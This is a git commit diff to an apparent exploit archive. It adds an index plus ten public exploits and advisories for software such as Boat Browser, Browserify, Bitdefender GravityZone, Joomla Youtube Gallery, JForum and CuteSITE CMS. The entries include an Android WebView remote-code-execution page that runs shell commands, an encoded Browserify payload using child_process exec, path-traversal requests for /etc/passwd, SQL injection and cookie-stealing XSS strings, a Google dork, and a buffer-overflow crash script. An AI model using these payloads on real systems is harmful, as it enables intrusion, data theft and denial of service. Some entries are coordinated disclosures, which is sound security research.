Updated 07_18_2014

2014-07-18 04:40:01 +00:00 · 2014-07-18 04:40:01 +00:00 · bb76fb3805
commit bb76fb3805
parent ce5a91ca65
11 changed files with 408 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30694,3 +30694,13 @@ id,file,description,date,author,platform,type,port
 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 'lang' Parameter Cross-Site Scripting Vulnerabilities",2009-12-30,emgent,php,webapps,0
 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
 34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress Cross Site Scripting Vulnerability",2010-06-04,MustLive,php,webapps,0
 34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443
 34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection Vulnerability",2014-07-16,"Pham Van Khanh",php,webapps,80
 34088,platforms/android/remote/34088.html,"Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability",2014-07-16,c0otlass,android,remote,0
 34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution Vulnerability",2014-07-16,"Cal Leeming",multiple,dos,0
 34091,platforms/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0
 34092,platforms/jsp/webapps/34092.txt,"JForum 2.1.8 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",jsp,webapps,0
 34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver '.ar' File Buffer Overflow Vulnerability",2010-01-15,R3d-D3V!L,windows,dos,0
 34095,platforms/php/webapps/34095.txt,"PonVFTP 'login.php' SQL Injection Vulnerability",2010-01-15,S2K9,php,webapps,0
 34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0
 34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x manage/main.php fld_path Parameter XSS",2010-06-06,"High-Tech Bridge SA",php,webapps,0
--- a/platforms/android/remote/34088.html
+++ b/platforms/android/remote/34088.html
@ -0,0 +1,72 @@
 <!--
 													.:: Remote code execution vulnerability in Boat Browser ::.
 credit: c0otlass
 social contact: https://twitter.com/c0otlass
 mail: c0otlass@gmail.com
 CVE reserved : 2014-4968
 time of discovery:  July 14, 2014
 Browser Official site:http://www.boatmob.com/
 Browser download link:https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en
 version Affected : In  8.0 and 8.0.1 tested , Android 3.0 through 4.1.x 
 Risk rate: High
 vulnerability Description impact: 
 	The WebView class and  use of the WebView.addJavascriptInterface method has vulnerability which cause remote code in html page run in android device
 	a related issue to CVE-2012-6636
 proof of concept:
 //..............................................poc.hmtl............................................
 -->
 <!DOCTYPE html>
 <html>
 <head>
 <meta charset="UFT-8">
 <title>CreatMalTxt POC - WebView</title>
 <script>
 var obj;
 function TestVulnerability()
 		{
 temp="not";
 var myObject = window;
 	for (var name in myObject) {										
 		if (myObject.hasOwnProperty(name)) {									
 			try
 			{				
 			temp=myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null);												 
 			}
 			catch(e)
 			{														
 			}
 			}
 	}
 				if(temp=="not")
 						{
 							document.getElementById("log").innerHTML="this browser has been patched";												
 						}
 					else{
 						 document.getElementById("log").innerHTML = "This browser is exploitabale" + "<br>" + " the poc file hase been created in sdcard ...<br>" ;
 						 document.getElementById("log").innerHTML +=  "we could see proccess information"+ temp.exec(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);																					
 						}
 		}		
 </script>
 </head>
 <body >
 <h3>CreatMalTxt POC</h3>
 <input value="Test Vulnerability"  type="button"  onclick="TestVulnerability();" />
 <div id="log"></div>
 </body>		
 </html>
 <!--
 Solution:
 https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
 http://www.programering.com/a/MDM3YzMwATc.html
 https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614		
 References: 
 http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/
 https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/
 http://50.56.33.56/blog/?p=314
 https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
 https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py
 -->
--- a/platforms/jsp/webapps/34092.txt
+++ b/platforms/jsp/webapps/34092.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/40600/info
 JForum is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
 Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
 JForum 2.1.8 is vulnerable; other versions may also be affected. 
 https://www.example.com/forum/bookmarks/insert/2/1.page?action=insertSave&description=<XSS>&module=bookmarks&relation_id=1&relation_type=2&title=<XSS>&visible=1
--- a/platforms/linux/webapps/34086.txt
+++ b/platforms/linux/webapps/34086.txt
@ -0,0 +1,166 @@
 SEC Consult Vulnerability Lab Security Advisory < 20140716-3 >
 =======================================================================
              title: Multiple critical vulnerabilities
            product: Bitdefender GravityZone
 vulnerable version: <5.1.11.432
      fixed version: >=5.1.11.432
             impact: critical
           homepage: http://www.bitdefender.com
              found: 2014-05-22
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab 
                     https://www.sec-consult.com
 =======================================================================
 Vendor description:
 -------------------
 Bitdefender GravityZone lets enterprises control and protect the heterogeneous
 environments of today. The solution combines highly optimized virtualization
 aware security with leading detection technologies and a fresh, but proven,
 architecture. It empowers administrators with features adapted to reduce the
 daily security hassle and eliminate the need for point solutions with unified
 protection across virtualized, physical, and mobile endpoints. Unlike other
 solutions that bolt-on modules to an aging architecture, the GravityZone
 Control Center dashboard has been designed specifically to unify monitoring
 and security management in a single simple and accessible interface.
 Source: http://download.bitdefender.com/resources/media/materials/business/en/datasheet-gravityzone-brief.pdf
 Business recommendation:
 ------------------------
 Attackers are able to completely compromise the Bitdefender GravityZone
 solution as they can gain system and database level access.
 Furthermore attackers can manage all endpoints.
 The Bitdefender GravityZone can be used as an entry point into the target
 infrastructure (lateral movement, privilege escalation).
 It is highly recommended by SEC Consult not to use this software until a
 thorough security review has been performed by security professionals and all
 identified issues have been resolved.
 Vulnerability overview/description:
 -----------------------------------
 1) Unauthenticated local file disclosure (Web Console, Update Server)
 Unauthenticated users can read arbitrary files from the filesystem with the
 privileges of the "nginx" operating system user. These files include
 configuration files containing sensitive information such as clear text
 passwords which can be used in further attacks.
 Separate vulnerabilities affecting both Web Console and Update Server were
 found.
 2) Insecure service configuration / design issues
 The MongoDB database which is offered via the network by default (TCP ports
 27017, 28017) can be accessed using hardcoded credentials which can't be
 changed. The overall system design requires the database to be accessible via
 the network.
 All relevant GravityZone configuration data can be accessed and changed. This
 includes the user table.
 Excerpt from the documentation describing the TCP port 27017:
 "Default port used by the Communication Server and Control Center to access
 the Database."
 3) Missing authentication
 Authentication is not required for certain scripts in the web UI. This
 allows unauthenticated attackers to execute administrative functions without
 prior authentication.
 Proof of concept:
 -----------------
 1) Unauthenticated local file disclosure (Web Console, Update Server)
 Arbitrary files can be downloaded via a vulnerable script:
 https://<host>/webservice/CORE/downloadFullKitEpc/a/1?id=../../../../../etc/passwd
 The Update Server is vulnerable to local file disclosure as well. Arbitrary
 files can be downloaded using the following HTTP request:
 GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
 Host: <host>:7074
 2) Insecure service configuration / Design issues
 Attackers can connect to MongoDB on TCP ports 27017 and 28017 using the
 following hardcoded credentials:
 Username: <removed>
 Password: <removed>
 Detailed proof of concept exploits have been removed for this vulnerability.
 3) Missing authentication
 Authentication is not required for the following script:
 /webservice/CORE/downloadSignedCsr (Unauthenticated certificate upload)
 Vulnerable / tested versions:
 -----------------------------
 The vulnerabilities have been verified to exist in GravityZone 5.1.5.386,
 which was the most recent version at the time of discovery.
 Vendor contact timeline:
 ------------------------
 2014-05-26: Sending responsible disclosure policy and requesting encryption
            keys.
 2014-05-26: Vendor responds providing encryption keys.
 2014-05-26: Sending advisory and proof of concept exploit via encrypted
            channel.
 2014-05-26: Vendor confirms receipt.
 2014-06-04: Requesting status update.
 2014-06-14: Vendor provides status update. Update will be released "End of
            June".
 2014-06-26: Vendor provides status update. Update for issue #1 and #3 will
            be released June 30. Update for issue #2 will be released at the
 			end of July.
 2014-06-27: Requesting info about other affected products. Clarifying
            disclosure of issue #2.
 2014-07-09: Vendor confirms that update for issue #1 and #3 has been shipped
            and KB article for issue #2 will be released.
 2014-07-15: Requesting version numbers of affected products.
 2014-07-16: SEC Consult releases coordinated security advisory.
 Solution:
 ---------
 Update to a more recent version of Bitdefender GravityZone _and_
 implement mitigations for the issue #2.
 More information can be found at:
 http://www.bitdefender.com/support/how-to-configure-iptables-firewall-rules-on-gravityzone-for-restricting-outside-access-to-mongodatabase-1265.html
 Workaround:
 -----------
 No workaround available.
 Advisory URL:
 -------------
 https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 SEC Consult Vulnerability Lab
 SEC Consult
 Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
 Headquarter:
 Mooslackengasse 17, 1190 Vienna, Austria
 Phone:   +43 1 8903043 0
 Fax:     +43 1 8903043 15
 Mail: research at sec-consult dot com
 Web: https://www.sec-consult.com
 Blog: http://blog.sec-consult.com
 Twitter: https://twitter.com/sec_consult
 EOF Stefan Viehböck / @2014
--- a/platforms/multiple/dos/34090.py
+++ b/platforms/multiple/dos/34090.py
@ -0,0 +1,43 @@
 #!/usr/bin/python
 """
 Browserify POC exploit
 http://iops.io/blog/browserify-rce-vulnerability/
 To run, just do:
 $ python poc.py > exploit.js
 $ browserify exploit.js
 BITCH I TOLD YOU THIS SHIT IS FABULOUS
 [[garbage output]]
 },{}]},{},[1]) 00:08:32 up 12:29,  3 users,  load average: 0.00, 0.02, 0.05
 uid=1001(foxx) gid=1001(foxx) groups=1001(foxx),27(sudo),105(fuse)
 You can also spawn() and create a connect back shell.
 Enjoy
 """
 def charencode(string):
    encoded=''
    for char in string:
        encoded=encoded+","+str(ord(char))
    return encoded[1:]
 plaintext = """
   var require = this.process.mainModule.require;
   var sys = require('sys')
   var exec = require('child_process').exec;
   function puts(error, stdout, stderr) { sys.puts(stdout) }
   exec("uptime && id", puts);
   console.log("BITCH I TOLD YOU THIS SHIT IS FABULOUS");
 """
 payload = charencode(plaintext)
 final = "eval(String.fromCharCode(%s));" %(payload)
 print "});"
 print final
 print "(function(){"
--- a/platforms/php/webapps/34087.txt
+++ b/platforms/php/webapps/34087.txt
@ -0,0 +1,51 @@
 # Exploit Title: Joomla component com_youtubegallery - SQL Injection
 vulnerability
 # Google Dork: inurl:index.php?option=com_youtubegallery
 # Date: 15-07-2014
 # Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
 # Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
 # Software Link: http://www.joomlaboat.com/youtube-gallery
 # Version: 4.x ( 3.x maybe)
 # Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
 # CVE : CVE-2014-4960
 Detail:
 In line: 40, file: components\com_youtubegallery\models\gallery.php,
 if parameter listid is int (or can cast to int), $listid and $themeid
 will not santinized.
 Source code:
 40: if(JRequest::getInt('listid'))
 41: {
 42:        //Shadow Box
 43:        $listid=JRequest::getVar('listid');
 44:
 45:
 46:        //Get Theme
 47:         $m_themeid=(int)JRequest::getVar('mobilethemeid');
 48:         if($m_themeid!=0)
 49:         {
 50:              if(YouTubeGalleryMisc::check_user_agent('mobile'))
 51:                    $themeid=$m_themeid;
 52:              else
 53:                    $themeid=JRequest::getVar('themeid');
 54:              }
 55:          else
 56:               $themeid=JRequest::getVar('themeid');
 57: }
 After, $themeid and $listid are used in line 86, 92. Two method
 getVideoListTableRow and getThemeTableRow concat string to construct
 sql query. So it is vulnerable to SQL Injection.
 Source code:
 86: if(!$this->misc->getVideoListTableRow($listid))
 87: {
 88:         echo '<p>No video found</p>';
 89:         return false;
 90: }
 91:
 92: if(!$this->misc->getThemeTableRow($themeid))
 93: {
 94:          echo '<p>No video found</p>';
 95:          return false;
 96: }
 # Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
--- a/platforms/php/webapps/34091.txt
+++ b/platforms/php/webapps/34091.txt
@ -0,0 +1,16 @@
 source: http://www.securityfocus.com/bid/40585/info
 Pay Per Minute Video Chat Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 Cross-site scripting:
 http://www.example.com/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
 http://www.example.com/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
 SQL-injection:
 http://www.example.com/P47H/index_ie.php?page=-666
--- a/platforms/php/webapps/34095.txt
+++ b/platforms/php/webapps/34095.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/40608/info
 PonVFTP is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
 The following example data is available:
 password: 'or' 1=1 
--- a/platforms/php/webapps/34096.txt
+++ b/platforms/php/webapps/34096.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/40612/info
 CuteSITE CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
 Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 CuteSITE CMS 1.5.0 is vulnerable; prior versions may also be affected.
 http://www.example.com/manage/add_user.php?user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user%28%29,15,16
--- a/platforms/php/webapps/34097.txt
+++ b/platforms/php/webapps/34097.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/40612/info
 CuteSITE CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
 Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 CuteSITE CMS 1.5.0 is vulnerable; prior versions may also be affected.
 http://www.example.com/manage/main.php?fld_path=XXX%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
--- a/platforms/windows/dos/34094.pl
+++ b/platforms/windows/dos/34094.pl
@ -0,0 +1,14 @@
 source: http://www.securityfocus.com/bid/40606/info
 Aqua Real Screensaver is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
 Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions.
 Aqua Real 1 and 2 are vulnerable; other versions may also be affected. 
 #!c/perl/bin/
 my $file= "Crash.ar";
 my $boom="\x41" x 5000;
 open(myfile,'>>Crash.ar') || die "Cannot Creat file\n\n";
 print myfile $boom;
 print "Done..!~#\n";